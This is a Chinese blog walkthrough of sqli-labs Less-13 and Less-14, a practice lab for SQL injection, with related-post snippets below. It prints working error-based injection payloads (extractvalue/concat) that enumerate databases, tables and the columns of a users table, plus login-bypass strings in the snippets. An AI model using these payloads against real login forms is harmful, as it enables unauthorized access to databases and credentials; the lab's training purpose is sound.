sqli-lab教程 less-13,14

已于 2022-07-10 15:01:41 修改
阅读量298 收藏 1
点赞数
文章标签: java servlet html
于 2022-07-09 15:29:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyuhensuai/article/details/125689406
版权

Lass-13

查找原SQL语句:$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1"

这一题我们需要使用burp suite。

首先我们在username和password中随便输入一串数字或字母,然后进入抓包开始操作。

首先我们来对数据库名进行查询:

uname=1111') and extractvalue(1,concat('%',database())) --+

如下图所示:

可以看出数据库名为“security”

接着我们来继续查询数据库有哪些

uname=1111') and extractvalue(1,concat('%',(select group_concat(schema_name) from information_schema.schemata))) --+

如下图所示:

 其次来查看security数据库中所有的数据表:

​uname=1111') and extractvalue(1,concat('%',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

如下图所示:

接着我们来显示users中的字段:

​uname=1111') and extractvalue(1,concat('%',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+

如图下图所示:

Lass-14

查找原SQL语句:$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1"

与Less-13的语句对比可以知晓只需把uname=1111')改为?uname=1111"即可

xiaoyuhensuai
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs第十三和十四关(post请求-报错盲注)
qq_42266432的博客
08-24 621
一上来,先加个单引号探探路,有sql报错回显 在单引号后继续加上and 1,试图让sql报错显示更多信息,从near ‘’) and password=(‘1’) LIMIT 0,1’ at line 1可以判断,这关就用单引号加括号了,没什么意思 注入’)却发现,页面没有回显,于是这里考虑使用报错盲注或者布尔盲注,时间延时说不定也行,先采用报错盲注吧 先使用order by 拆解出字段数为2 爆出当前数据库 uname=uname=1') and 1 union select 1,updatex.
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
sqli-labs/Less-13
m0_71299382的博客
11-18 264
sqli-labs第十三关
sqli-labs靶场第十三关
gou1791241251的博客
12-27 766
paloy:admin’) or (select table_name from information_schema.tables where table_schema=database() limit 0,1)=‘emails’ # 闭合方式为’) 可以使用布尔盲注和报错注入
Sqli-labs靶场第13关详解[Sqli-labs-less-13]
最新发布
m0_73615178的博客
03-02 574
所以,payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。整条语句使用单引号加小括号 ") 闭合。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。
sqli-labs第十三关--十五关
小人物的博客
06-18 3237
第十三关 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,...
sqlilabs less13~14
TA不懒,但还没有添加简介
07-01 263
sqlilabs less13
第三节 Sqli-lab环境搭建-01
09-15
第三节 Sqli-lab环境搭建-01
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
[网络安全]sqli-labs Less-13 解题详析
等风来
07-24 2309
以上为[网络安全]sqli-labs Less-13 解题详析,后续将分享[网络安全]sqli-labs Less-14 解题详析我是秋说,我们下次见。
Sqli-labs之Less-13和Less-14
→_→
04-05 1121
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
sqli-libs基础篇总结(1-22)
qq_33557485的博客
08-15 2408
1.关于sqli-labs 这个是sql注入的靶场。可以在git上下载。 2.题目简介 前面的1-22题都是sql注入的基础题目。覆盖范围很广,不过都是针对mysql数据库的。 1-4题:union注入 5-8题:布尔盲注 9-10题:延时盲注 11-12题:post形式的显错注入 13-16题:post形式的布尔盲注 17题:update语句的显错注入 18-19题:htt...
LESS-13
qq_44598397的博客
03-21 373
LESS-13 源码: 输入:admin’,出现错误提示,可以知道sql注入中是用’)闭合。 输入:admin’)# 因为这里有报错,所以可以用报错注入 admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))# 布尔注入: admin’) and left(database(),1)>‘a’#(可以用二分法进...
sqli-labs ————less -13
Fly_鹏程万里
05-11 977
Less -13源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&g..
Sqli-labs通关手册【1-30关】
李安北的博客
05-03 7122
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值